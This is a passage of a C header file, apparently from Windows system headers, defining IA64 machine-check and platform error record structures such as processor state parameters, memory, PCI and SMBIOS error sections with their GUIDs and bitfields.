} DUMMYSTRUCTNAME; 749 | } ERROR_PROCESSOR_VALID, *PERROR_PROCESSOR_VALID; 750 | 751 | typedef union _ERROR_PROCESSOR_ERROR_MAP { 752 | ULONGLONG ErrorMap; 753 | struct { 754 | ULONGLONG Cid:4; // bits 0- 3: Processor Core Identifier 755 | ULONGLONG Tid:4; // 4- 7: Logical Thread Identifier 756 | ULONGLONG Eic:4; // 8-11: Instruction Caches Level Information 757 | ULONGLONG Edc:4; // 12-15: Data Caches Level Information 758 | ULONGLONG Eit:4; // 16-19: Instruction TLB Level Information 759 | ULONGLONG Edt:4; // 20-23: Data TLB Level Information 760 | ULONGLONG Ebh:4; // 24-27: Processor Bus Level Information 761 | ULONGLONG Erf:4; // 28-31: Register File Level Information 762 | ULONGLONG Ems:16; // 32-47: MicroArchitecture Level Information 763 | ULONGLONG Reserved:16; 764 | } DUMMYSTRUCTNAME; 765 | } ERROR_PROCESSOR_ERROR_MAP, *PERROR_PROCESSOR_ERROR_MAP; 766 | 767 | typedef ERROR_PROCESSOR_ERROR_MAP _ERROR_PROCESSOR_LEVEL_INDEX; 768 | typedef _ERROR_PROCESSOR_LEVEL_INDEX ERROR_PROCESSOR_LEVEL_INDEX, *PERROR_PROCESSOR_LEVEL_INDEX; 769 | 770 | typedef union _ERROR_PROCESSOR_STATE_PARAMETER { 771 | ULONGLONG StateParameter; 772 | struct { 773 | ULONGLONG reserved0:2; // 0-1 : reserved 774 | ULONGLONG rz:1; // 2 : Rendezvous successful 775 | ULONGLONG ra:1; // 3 : Rendezvous attempted 776 | ULONGLONG me:1; // 4 : Distinct Multiple errors 777 | ULONGLONG mn:1; // 5 : Min-state Save Area registered 778 | ULONGLONG sy:1; // 6 : Storage integrity synchronized 779 | ULONGLONG co:1; // 7 : Continuable 780 | ULONGLONG ci:1; // 8 : Machine Check isolated 781 | ULONGLONG us:1; // 9 : Uncontained Storage damage 782 | ULONGLONG hd:1; // 10 : Hardware damage 783 | ULONGLONG tl:1; // 11 : Trap lost 784 | ULONGLONG mi:1; // 12 : More Information 785 | ULONGLONG pi:1; // 13 : Precise Instruction pointer 786 | ULONGLONG pm:1; // 14 : Precise Min-state Save Area 787 | ULONGLONG dy:1; // 15 : Processor Dynamic State valid 788 | ULONGLONG in:1; // 16 : INIT interruption 789 | ULONGLONG rs:1; // 17 : RSE valid 790 | ULONGLONG cm:1; // 18 : Machine Check corrected 791 | ULONGLONG ex:1; // 19 : Machine Check expected 792 | ULONGLONG cr:1; // 20 : Control Registers valid 793 | ULONGLONG pc:1; // 21 : Performance Counters valid 794 | ULONGLONG dr:1; // 22 : Debug Registers valid 795 | ULONGLONG tr:1; // 23 : Translation Registers valid 796 | ULONGLONG rr:1; // 24 : Region Registers valid 797 | ULONGLONG ar:1; // 25 : Application Registers valid 798 | ULONGLONG br:1; // 26 : Branch Registers valid 799 | ULONGLONG pr:1; // 27 : Predicate Registers valid 800 | ULONGLONG fp:1; // 28 : Floating-Point Registers valid 801 | ULONGLONG b1:1; // 29 : Preserved Bank 1 General Registers valid 802 | ULONGLONG b0:1; // 30 : Preserved Bank 0 General Registers valid 803 | ULONGLONG gr:1; // 31 : General Registers valid 804 | ULONGLONG dsize:16; // 47-32 : Processor Dynamic State size 805 | ULONGLONG reserved1:11; // 48-58 : reserved 806 | ULONGLONG cc:1; // 59 : Cache Check 807 | ULONGLONG tc:1; // 60 : TLB Check 808 | ULONGLONG bc:1; // 61 : Bus Check 809 | ULONGLONG rc:1; // 62 : Register File Check 810 | ULONGLONG uc:1; // 63 : Micro-Architectural Check 811 | } DUMMYSTRUCTNAME; 812 | } ERROR_PROCESSOR_STATE_PARAMETER, *PERROR_PROCESSOR_STATE_PARAMETER; 813 | 814 | typedef union _PROCESSOR_LOCAL_ID { 815 | ULONGLONG LocalId; 816 | struct { 817 | ULONGLONG reserved:16; // 0-16 : reserved 818 | ULONGLONG eid:8; // 16-23 : Extended Id 819 | ULONGLONG id:8; // 24-31 : Id 820 | ULONGLONG ignored:32; // 32-63 : ignored 821 | } DUMMYSTRUCTNAME; 822 | } PROCESSOR_LOCAL_ID, *PPROCESSOR_LOCAL_ID; 823 | 824 | typedef struct _ERROR_PROCESSOR_MS { 825 | ULONGLONG MsError [ /* Valid.MsCheckNum */ 1]; // 0 -> 15 registers file errors. 826 | } ERROR_PROCESSOR_MS, *PERROR_PROCESSOR_MS; 827 | 828 | typedef struct _ERROR_PROCESSOR_CPUID_INFO { // Must be 48 bytes. 829 | ULONGLONG CpuId0; 830 | ULONGLONG CpuId1; 831 | ULONGLONG CpuId2; 832 | ULONGLONG CpuId3; 833 | ULONGLONG CpuId4; 834 | ULONGLONG Reserved; 835 | } ERROR_PROCESSOR_CPUID_INFO, *PERROR_PROCESSOR_CPUID_INFO; 836 | 837 | typedef union _ERROR_PROCESSOR_STATIC_INFO_VALID { 838 | ULONGLONG Valid; 839 | struct { // Bits 840 | // Warning: Match the VALID fields with the _ERROR_PROCESSOR_STATIC_INFO members. 841 | // KD extensions use the field names to access the PSI structure. 842 | ULONGLONG MinState: 1; // 0: MinState valid. 843 | ULONGLONG BR: 1; // 1: Branch Registers valid. 844 | ULONGLONG CR: 1; // 2: Control Registers valid. 845 | ULONGLONG AR: 1; // 3: Application Registers valid. 846 | ULONGLONG RR: 1; // 4: Registers valid. 847 | ULONGLONG FR: 1; // 5: Registers valid. 848 | ULONGLONG Reserved: 58; // 6-63: Reserved. 849 | } DUMMYSTRUCTNAME; 850 | } ERROR_PROCESSOR_STATIC_INFO_VALID, *PERROR_PROCESSOR_STATIC_INFO_VALID; 851 | 852 | typedef struct _ERROR_PROCESSOR_STATIC_INFO { 853 | ERROR_PROCESSOR_STATIC_INFO_VALID Valid; 854 | UCHAR MinState[ /* SAL Specs, July 2000 and Jan 2001 state approximatively: */ 1024]; 855 | ULONGLONG BR [ 8 ]; 856 | ULONGLONG CR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ]; 857 | ULONGLONG AR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ]; 858 | ULONGLONG RR [ 8 ]; 859 | ULONGLONG FR [ 2 * 128 ]; 860 | } ERROR_PROCESSOR_STATIC_INFO, *PERROR_PROCESSOR_STATIC_INFO; 861 | 862 | typedef struct _ERROR_PROCESSOR { 863 | ERROR_SECTION_HEADER Header; 864 | ERROR_PROCESSOR_VALID Valid; 865 | ERROR_PROCESSOR_ERROR_MAP ErrorMap; 866 | ERROR_PROCESSOR_STATE_PARAMETER StateParameter; 867 | PROCESSOR_LOCAL_ID CRLid; 868 | #if 0 869 | // The presence of the following data depends on the valid bits 870 | // from ERROR_PROCESSOR.Valid. 871 | // 872 | ERROR_MODINFO CacheErrorInfo [ /* Valid.CacheCheckNum */ ]; // 0->15 cache error modinfo structs. 873 | ERROR_MODINFO TlbErrorInfo [ /* Valid.TlbCheckNum */ ]; // 0->15 tlb error modinfo structs. 874 | ERROR_MODINFO BusErrorInfo [ /* Valid.BusCheckNum */ ]; // 0->15 bus error modinfo structs. 875 | ERROR_MODINFO RegFileCheckInfo [ /* Valid.RegFileCheckNum */ ]; // 0->15 registers file errors. 876 | ERROR_MODINFO MsCheckInfo [ /* Valid.MsCheckNum */ ]; // 0->15 registers file errors. 877 | ERROR_PROCESSOR_CPUID_INFO CpuIdInfo; // field will always be there but could be zero-padded. 878 | ERROR_PROCESSOR_STATIC_INFO StaticInfo; // field will always be there but could be zero-padded. 879 | #endif // 0 880 | } ERROR_PROCESSOR, *PERROR_PROCESSOR; 881 | 882 | // 883 | // IA64 ERROR PROCESSOR State Parameter - GR18 - definitions. 884 | // 885 | 886 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_SHIFT 59 887 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_MASK 0x1 888 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_SHIFT 60 889 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_MASK 0x1 890 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_SHIFT 61 891 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_MASK 0x1 892 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_SHIFT 62 893 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_MASK 0x1 894 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT 63 895 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK 0x1 896 | 897 | // 898 | // For legacy consumers 899 | // 900 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_SHIFT ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT 901 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_MASK ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK 902 | 903 | //////////////////////////////////////////////////////////////////// 904 | // 905 | // IA64 PLATFORM ERRORS Definitions 906 | // 907 | // We tried to respect the order in which these error devices are 908 | // presented in the SAL specs. 909 | 910 | // 911 | // IA64 ERRORS: _ERR_TYPE definitions 912 | // 913 | // Warning 04/01/01: "ERR_TYPE" or "ERROR_TYPE" are already used in the NT namespace. 914 | // 915 | 916 | typedef enum _ERR_TYPES { 917 | // Generic error types: 918 | ERR_INTERNAL = 1, // Error detected internal to the component 919 | ERR_BUS = 16, // Error detected in the bus 920 | // Detailed Internal Error Types: 921 | ERR_MEM = 4, // Storage error in memory (DRAM) 922 | ERR_TLB = 5, // Storage error in TLB 923 | ERR_CACHE = 6, // Storage error in cache 924 | ERR_FUNCTION = 7, // Error in one or more functional units 925 | ERR_SELFTEST = 8, // Component failed self test 926 | ERR_FLOW = 9, // Overflow or Undervalue of internal queue 927 | // Detailed Bus Error Types: 928 | ERR_MAP = 17, // Virtual address not found on IO-TLB or IO-PDIR 929 | ERR_IMPROPER = 18, // Improper access error 930 | ERR_UNIMPL = 19, // Access to a memory address which is not mapped to any component 931 | ERR_LOL = 20, // Loss Of Lockstep 932 | ERR_RESPONSE = 21, // Response to which there is no associated request 933 | ERR_PARITY = 22, // Bus parity error 934 | ERR_PROTOCOL = 23, // Detection of a protocol error 935 | ERR_ERROR = 24, // Detection of PATH_ERROR 936 | ERR_TIMEOUT = 25, // Bus operation time-out 937 | ERR_POISONED = 26, // A read was issued to data which has been poisoned 938 | } _ERR_TYPE; 939 | 940 | // 941 | // IA64 ERRORS: ERROR_STATUS definitions 942 | // 943 | 944 | typedef union _ERROR_STATUS { 945 | ULONGLONG Status; 946 | struct { // Bits: 947 | ULONGLONG Reserved0:8; // 7-0: Reserved 948 | ULONGLONG Type:8; // 15-8: Error Type - See _ERR_TYPE definitions. 949 | ULONGLONG Address:1; // 16: Error was detected on address signals or on address portion of transaction 950 | ULONGLONG Control:1; // 17: Error was detected on control signals or in control portion of transaction 951 | ULONGLONG Data:1; // 18: Error was detected on data signals or in data portion of transaction 952 | ULONGLONG Responder:1; // 19: Error was detected by responder of transaction 953 | ULONGLONG Requestor:1; // 20: Error was detected by requester of transaction 954 | ULONGLONG FirstError:1; // 21: If multiple errors, this is the first error of the highest severity that occurred 955 | ULONGLONG Overflow:1; // 22: Additional errors occurred which were not logged because registers overflow 956 | ULONGLONG Reserved1:41; // 63-23: Reserved 957 | } DUMMYSTRUCTNAME; 958 | } ERROR_STATUS, *PERROR_STATUS; 959 | 960 | // 961 | // IA64 ERRORS: Platform OEM_DATA definitions 962 | // 963 | 964 | typedef struct _ERROR_OEM_DATA { 965 | USHORT Length; 966 | #if 0 967 | UCHAR Data[/* ERROR_OEM_DATA.Length */]; 968 | #endif // 0 969 | } ERROR_OEM_DATA, *PERROR_OEM_DATA; 970 | 971 | // 972 | // IA64 ERRORS: Platform BUS_SPECIFIC_DATA definitions 973 | // 974 | 975 | typedef union _ERROR_BUS_SPECIFIC_DATA { 976 | ULONGLONG BusSpecificData; 977 | struct { // Bits : 978 | ULONGLONG LockAsserted:1; // 0: LOCK# Asserted during request phase 979 | ULONGLONG DeferLogged:1; // 1: Defer phase is logged 980 | ULONGLONG IOQEmpty:1; // 2: IOQ is empty 981 | ULONGLONG DeferredTransaction:1; // 3: Component interface deferred transaction 982 | ULONGLONG RetriedTransaction:1; // 4: Component interface retried transaction 983 | ULONGLONG MemoryClaimedTransaction:1; // 5: memory claimed the transaction 984 | ULONGLONG IOClaimedTransaction:1; // 6: IO controller claimed the transaction 985 | ULONGLONG ResponseParitySignal:1; // 7: Response parity signal 986 | ULONGLONG DeferSignal:1; // 8: DEFER# signal 987 | ULONGLONG HitMSignal:1; // 9: HITM# signal 988 | ULONGLONG HitSignal:1; // 10: HIT# signal 989 | ULONGLONG RequestBusFirstCycle:6; // 16-11: First cycle of request bus 990 | ULONGLONG RequestBusSecondCycle:6; // 22-17: Second cycle of request bus 991 | ULONGLONG AddressParityBusFirstCycle:2; // 24-23: First cycle of address parity bus 992 | ULONGLONG AddressParityBusSecondCycle:2; // 26-25: Second cycle of address parity 993 | ULONGLONG ResponseBus:3; // 29-27: Response bus 994 | ULONGLONG RequestParitySignalFirstCycle:1; // 30: First cycle of request parity signal 995 | ULONGLONG RequestParitySignalSecondCycle:1; // 31: Second cycle of request parity signal 996 | ULONGLONG Reserved:32; // 63-32: Reserved 997 | } DUMMYSTRUCTNAME; 998 | } ERROR_BUS_SPECIFIC_DATA, *PERROR_BUS_SPECIFIC_DATA; 999 | 1000 | // 1001 | // IA64 ERRORS: Platform ERROR_MEMORY device definitions 1002 | // 1003 | // With reference to the ACPI Memory Device. 1004 | // 1005 | 1006 | #define ERROR_MEMORY_GUID \ 1007 | { 0xe429faf2, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1008 | 1009 | typedef union _ERROR_MEMORY_VALID { 1010 | ULONGLONG Valid; 1011 | struct { // Bits 1012 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1013 | ULONGLONG PhysicalAddress:1; // 1: Physical Address valid bit 1014 | ULONGLONG AddressMask:1; // 2: Address Mask bit 1015 | ULONGLONG Node:1; // 3: Node valid bit 1016 | ULONGLONG Card:1; // 4: Card valid bit 1017 | ULONGLONG Module:1; // 5: Module valid bit 1018 | ULONGLONG Bank:1; // 6: Bank valid bit 1019 | ULONGLONG Device:1; // 7: Device valid bit 1020 | ULONGLONG Row:1; // 8: Row valid bit 1021 | ULONGLONG Column:1; // 9: Column valid bit 1022 | ULONGLONG BitPosition:1; // 10: Bit Position valid bit 1023 | ULONGLONG RequestorId:1; // 11: Platform Requester Id valid bit 1024 | ULONGLONG ResponderId:1; // 12: Platform Responder Id valid bit 1025 | ULONGLONG TargetId:1; // 13: Platform Target Id valid bit 1026 | ULONGLONG BusSpecificData:1; // 14: Platform Bus specific data valid bit 1027 | ULONGLONG OemId:1; // 15: Platform OEM id valid bit 1028 | ULONGLONG OemData:1; // 16: Platform OEM data valid bit 1029 | ULONGLONG Reserved:47; // 63-17: Reserved 1030 | } DUMMYSTRUCTNAME; 1031 | } ERROR_MEMORY_VALID, *PERROR_MEMORY_VALID; 1032 | 1033 | typedef struct _ERROR_MEMORY { 1034 | ERROR_SECTION_HEADER Header; 1035 | ERROR_MEMORY_VALID Valid; 1036 | ERROR_STATUS ErrorStatus; // Memory device error status fields - See ERROR_STATUS defs. 1037 | ULONGLONG PhysicalAddress; // Physical Address of the memory error 1038 | ULONGLONG PhysicalAddressMask; // Valid bits for Physical Address 1039 | USHORT Node; // Node identifier in a multi-node system 1040 | USHORT Card; // Card number of the memory error location 1041 | USHORT Module; // Module number of the memory error location 1042 | USHORT Bank; // Bank number of the memory error location 1043 | USHORT Device; // Device number of the memory error location 1044 | USHORT Row; // Row number of the memory error location 1045 | USHORT Column; // Column number of the memory error location 1046 | USHORT BitPosition; // Bit within the word that is in error 1047 | ULONGLONG RequestorId; // Hardware address of the device or component initiating transaction 1048 | ULONGLONG ResponderId; // Hardware address of the responder to transaction 1049 | ULONGLONG TargetId; // Hardware address of intended target of transaction 1050 | ULONGLONG BusSpecificData; // Bus dependent data of the on-board processor. It is a OEM specific field. 1051 | UCHAR OemId[16]; // OEM defined identification for memory controller 1052 | ERROR_OEM_DATA OemData; // OEM platform specific data. 1053 | } ERROR_MEMORY, *PERROR_MEMORY; 1054 | 1055 | // 1056 | // IA64 ERRORS: Platform ERROR_PCI_BUS device definitions 1057 | // 1058 | // With reference to the PCI Specifications. 1059 | // 1060 | 1061 | #define ERROR_PCI_BUS_GUID \ 1062 | { 0xe429faf4, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1063 | 1064 | typedef union _ERROR_PCI_BUS_VALID { 1065 | ULONGLONG Valid; 1066 | struct { // Bits 1067 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1068 | ULONGLONG ErrorType:1; // 1: Error Type valid bit 1069 | ULONGLONG Id:1; // 2: Identifier valid bit 1070 | ULONGLONG Address:1; // 3: Address valid bit 1071 | ULONGLONG Data:1; // 4: Data valid bit 1072 | ULONGLONG CmdType:1; // 5: Command Type valid bit 1073 | ULONGLONG RequestorId:1; // 6: Requester Identifier valid bit 1074 | ULONGLONG ResponderId:1; // 7: Responder Identifier valid bit 1075 | ULONGLONG TargetId:1; // 8: Target Identifier valid bit 1076 | ULONGLONG OemId:1; // 9: OEM Identification valid bit 1077 | ULONGLONG OemData:1; // 10: OEM Data valid bit 1078 | ULONGLONG Reserved:53; // 11-63: Reserved 1079 | } DUMMYSTRUCTNAME; 1080 | } ERROR_PCI_BUS_VALID, *PERROR_PCI_BUS_VALID; 1081 | 1082 | typedef struct _ERROR_PCI_BUS_TYPE { 1083 | UCHAR Type; 1084 | UCHAR Reserved; 1085 | } ERROR_PCI_BUS_TYPE, *PERROR_PCI_BUS_TYPE; 1086 | 1087 | #define PciBusUnknownError ((UCHAR)0) 1088 | #define PciBusDataParityError ((UCHAR)1) 1089 | #define PciBusSystemError ((UCHAR)2) 1090 | #define PciBusMasterAbort ((UCHAR)3) 1091 | #define PciBusTimeOut ((UCHAR)4) 1092 | #define PciMasterDataParityError ((UCHAR)5) 1093 | #define PciAddressParityError ((UCHAR)6) 1094 | #define PciCommandParityError ((UCHAR)7) 1095 | // PciOtherErrors Reserved 1096 | 1097 | typedef struct _ERROR_PCI_BUS_ID { 1098 | UCHAR BusNumber; // Bus Number 1099 | UCHAR SegmentNumber; // Segment Number 1100 | } ERROR_PCI_BUS_ID, *PERROR_PCI_BUS_ID; 1101 | 1102 | typedef struct _ERROR_PCI_BUS { 1103 | ERROR_SECTION_HEADER Header; 1104 | ERROR_PCI_BUS_VALID Valid; 1105 | ERROR_STATUS ErrorStatus; // PCI Bus Error Status - See ERROR_STATUS definitions. 1106 | ERROR_PCI_BUS_TYPE Type; // PCI Bus Error Type 1107 | ERROR_PCI_BUS_ID Id; // PCI Bus Identifier 1108 | UCHAR Reserved[4]; // Reserved 1109 | ULONGLONG Address; // Memory or IO Address on the PCI bus at 1110 | // the time of the event 1111 | ULONGLONG Data; // Data on the PCI bus at time of the event 1112 | ULONGLONG CmdType; // Bus Command or Operation at time of the event 1113 | ULONGLONG RequestorId; // Bus Requester Identifier at time of the event 1114 | ULONGLONG ResponderId; // Bus Responder Identifier at time of the event 1115 | ULONGLONG TargetId; // Intended Bus Target Identifier at time of the event 1116 | UCHAR OemId[16]; // OEM defined identification for pci bus 1117 | ERROR_OEM_DATA OemData; // OEM specific data. 1118 | } ERROR_PCI_BUS, *PERROR_PCI_BUS; 1119 | 1120 | // 1121 | // IA64 ERRORS: Platform ERROR_PCI_COMPONENT device definitions 1122 | // 1123 | // With reference to the PCI Specifications. 1124 | // 1125 | 1126 | #define ERROR_PCI_COMPONENT_GUID \ 1127 | { 0xe429faf6, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1128 | 1129 | typedef union _ERROR_PCI_COMPONENT_VALID { 1130 | ULONGLONG Valid; 1131 | struct { // Bits: 1132 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1133 | ULONGLONG Info:1; // 1: Information valid bit 1134 | ULONGLONG MemoryMappedRegistersPairs:1; // 2: Number of Memory Mapped Registers Pairs valid bit 1135 | ULONGLONG ProgrammedIORegistersPairs:1; // 3: Number of Programmed IO Registers Pairs valid bit 1136 | ULONGLONG RegistersDataPairs:1; // 4: Memory Mapped Registers Pairs valid bit 1137 | ULONGLONG OemData:1; // 5: OEM Data valid bit. 1138 | ULONGLONG Reserved:58; // 63-6: Reserved 1139 | } DUMMYSTRUCTNAME; 1140 | } ERROR_PCI_COMPONENT_VALID, *PERROR_PCI_COMPONENT_VALID; 1141 | 1142 | typedef struct _ERROR_PCI_COMPONENT_INFO { // Bytes: 1143 | USHORT VendorId; // 0-1: Vendor Identifier 1144 | USHORT DeviceId; // 2-3: Device Identifier 1145 | UCHAR ClassCodeInterface; // 4: Class Code.Interface field 1146 | UCHAR ClassCodeSubClass; // 5: Class Code.SubClass field 1147 | UCHAR ClassCodeBaseClass; // 6: Class Code.BaseClass field 1148 | UCHAR FunctionNumber; // 7: Function Number 1149 | UCHAR DeviceNumber; // 8: Device Number 1150 | UCHAR BusNumber; // 9: Bus Number 1151 | UCHAR SegmentNumber; // 10: Segment Number 1152 | UCHAR Reserved0; 1153 | ULONG Reserved1; 1154 | } ERROR_PCI_COMPONENT_INFO, *PERROR_PCI_COMPONENT_INFO; 1155 | 1156 | typedef struct _ERROR_PCI_COMPONENT { 1157 | ERROR_SECTION_HEADER Header; 1158 | ERROR_PCI_COMPONENT_VALID Valid; 1159 | ERROR_STATUS ErrorStatus; // Component Error Status 1160 | ERROR_PCI_COMPONENT_INFO Info; // Component Information 1161 | ULONG MemoryMappedRegistersPairs; // Number of Memory Mapped Registers Pairs 1162 | ULONG ProgrammedIORegistersPairs; // Number of Programmed IO Registers Pairs 1163 | #if 0 1164 | ULONGLONG RegistersPairs[/* 2 * (MemoryMappedRegistersPairs + ProgrammedIORegistersPairs) */]; 1165 | ERROR_OEM_DATA OemData; 1166 | #endif // 0 1167 | } ERROR_PCI_COMPONENT, *PERROR_PCI_COMPONENT; 1168 | 1169 | // 1170 | // IA64 ERRORS: Platform ERROR_SYSTEM_EVENT_LOG device definitions 1171 | // 1172 | // With reference to the IPMI System Event Log. 1173 | // 1174 | 1175 | #define ERROR_SYSTEM_EVENT_LOG_GUID \ 1176 | { 0xe429faf3, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1177 | 1178 | typedef union _ERROR_SYSTEM_EVENT_LOG_VALID { 1179 | ULONGLONG Valid; 1180 | struct { // Bits 1181 | ULONGLONG RecordId:1; // 0: Record Identifier valid bit 1182 | ULONGLONG RecordType:1; // 1: Record Type valid bit 1183 | ULONGLONG GeneratorId:1; // 2: Generator Identifier valid bit 1184 | ULONGLONG EVMRev:1; // 3: Event Format Revision valid bit 1185 | ULONGLONG SensorType:1; // 4: Sensor Type valid bit 1186 | ULONGLONG SensorNum:1; // 5: Sensor Number valid bit 1187 | ULONGLONG EventDirType:1; // 6: Event Dir valid bit 1188 | ULONGLONG EventData1:1; // 7: Event Data1 valid bit 1189 | ULONGLONG EventData2:1; // 8: Event Data2 valid bit 1190 | ULONGLONG EventData3:1; // 9: Event Data3 valid bit 1191 | ULONGLONG Reserved:54; // 10-63: 1192 | } DUMMYSTRUCTNAME; 1193 | } ERROR_SYSTEM_EVENT_LOG_VALID, *PSYSTEM_EVENT_LOG_VALID; 1194 | 1195 | typedef struct _ERROR_SYSTEM_EVENT_LOG { 1196 | ERROR_SECTION_HEADER Header; 1197 | ERROR_SYSTEM_EVENT_LOG_VALID Valid; 1198 | USHORT RecordId; // Record Identifier used for SEL record access 1199 | UCHAR RecordType; // Record Type: 1200 | // 0x02 - System Event Record 1201 | // 0xC0 - 0xDF OEM time stamped, bytes 8-16 OEM defined 1202 | // 0xE0 - 0xFF OEM non-time stamped, bytes 4-16 OEM defined 1203 | ULONG TimeStamp; // Time stamp of the event log 1204 | USHORT GeneratorId; // Software ID if event was generated by software 1205 | // Byte 1: 1206 | // Bit 0 - set to 1 when using system software 1207 | // Bit 7:1 - 7-bit system ID 1208 | // Byte 2: 1209 | // Bit 1:0 - IPMB device LUN if byte 1 holds subordinate 1210 | // address, 0x0 otherwise 1211 | // Bit 7:2 - Reserved. 1212 | UCHAR EVMRevision; // Error message format version 1213 | UCHAR SensorType; // Sensor Type code of the sensor that generated event 1214 | UCHAR SensorNumber; // Number of the sensor that generated event 1215 | UCHAR EventDir; // Event Dir 1216 | // Bit 7 - 0: asserted, 1: desasserted 1217 | // Event Type 1218 | // Bit 6:0 - Event Type code 1219 | UCHAR Data1; // Event data field 1220 | UCHAR Data2; // Event data field 1221 | UCHAR Data3; // Event data field 1222 | } ERROR_SYSTEM_EVENT_LOG, *PERROR_SYSTEM_EVENT_LOG; 1223 | 1224 | // 1225 | // IA64 ERRORS: Platform ERROR_SMBIOS device definitions 1226 | // 1227 | // With reference to the SMBIOS Specifications. 1228 | // 1229 | 1230 | #define ERROR_SMBIOS_GUID \ 1231 | { 0xe429faf5, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1232 | 1233 | typedef union _ERROR_SMBIOS_VALID { 1234 | ULONGLONG Valid; 1235 | struct { // Bits 1236 | ULONGLONG EventType:1; // 0: Event Type valid bit 1237 | ULONGLONG Length:1; // 1: Length valid bit 1238 | ULONGLONG TimeStamp:1; // 2: Time Stamp valid bit 1239 | ULONGLONG OemData:1; // 3: Data valid bit 1240 | ULONGLONG Reserved:60; // 4-63: 1241 | } DUMMYSTRUCTNAME; 1242 | } ERROR_SMBIOS_VALID, *PERROR_SMBIOS_VALID; 1243 | 1244 | // 1245 | // ERROR_SMBIOS.Type definitions 1246 | // 1247 | 1248 | typedef UCHAR ERROR_SMBIOS_EVENT_TYPE, *PERROR_SMBIOS_EVENT_TYPE; 1249 | // enum values defined in SMBIOS 2.3 - 3.3.16.6.1 1250 | 1251 | typedef struct _ERROR_SMBIOS { 1252 | ERROR_SECTION_HEADER Header; 1253 | ERROR_SMBIOS_VALID Valid; 1254 | ERROR_SMBIOS_EVENT_TYPE EventType; // Event Type 1255 | UCHAR Length; // Length of the error information in bytes 1256 | ERROR_TIMESTAMP TimeStamp; // Event Time Stamp 1257 | ERROR_OEM_DATA OemData; // Optional data validated by SMBIOS.Valid.Data. 1258 | } ERROR_SMBIOS, *PERROR_SMBIOS; 1259 | 1260 | // 1261 | // IA64 ERRORS: Platform Specific error device definitions 1262 | // 1263 | 1264 | #define ERROR_PLATFORM_SPECIFIC_GUID \ 1265 | { 0xe429faf7, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1266 | 1267 | typedef union _ERROR_PLATFORM_SPECIFIC_VALID { 1268 | ULONGLONG Valid; 1269 | struct { // Bits: 1270 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1271 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit 1272 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit 1273 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit 1274 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit 1275 | ULONGLONG OemId:1; // 5: OEM Identification valid bit 1276 | ULONGLONG OemData:1; // 6: OEM Data valid bit 1277 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit 1278 | ULONGLONG Reserved:56; // 63-8: Reserved 1279 | } DUMMYSTRUCTNAME; 1280 | } ERROR_PLATFORM_SPECIFIC_VALID, *PERROR_PLATFORM_SPECIFIC_VALID; 1281 | 1282 | typedef struct _ERROR_PLATFORM_SPECIFIC { 1283 | ERROR_SECTION_HEADER Header; 1284 | ERROR_PLATFORM_SPECIFIC_VALID Valid; 1285 | ERROR_STATUS ErrorStatus; // Platform Generic Error Status 1286 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event 1287 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event 1288 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event 1289 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data 1290 | UCHAR OemId[16]; // OEM specific data for bus identification 1291 | ERROR_OEM_DATA OemData; // OEM specific data 1292 | #if 0 1293 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path. 1294 | #endif // 0 1295 | } ERROR_PLATFORM_SPECIFIC, *PERROR_PLATFORM_SPECIFIC; 1296 | 1297 | // 1298 | // IA64 ERRORS: Platform Bus error device definitions 1299 | // 1300 | 1301 | #define ERROR_PLATFORM_BUS_GUID \ 1302 | { 0xe429faf9, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1303 | 1304 | typedef union _ERROR_PLATFORM_BUS_VALID { 1305 | ULONGLONG Valid; 1306 | struct { // Bits: 1307 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1308 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit 1309 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit 1310 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit 1311 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit 1312 | ULONGLONG OemId:1; // 5: OEM Identification valid bit 1313 | ULONGLONG OemData:1; // 6: 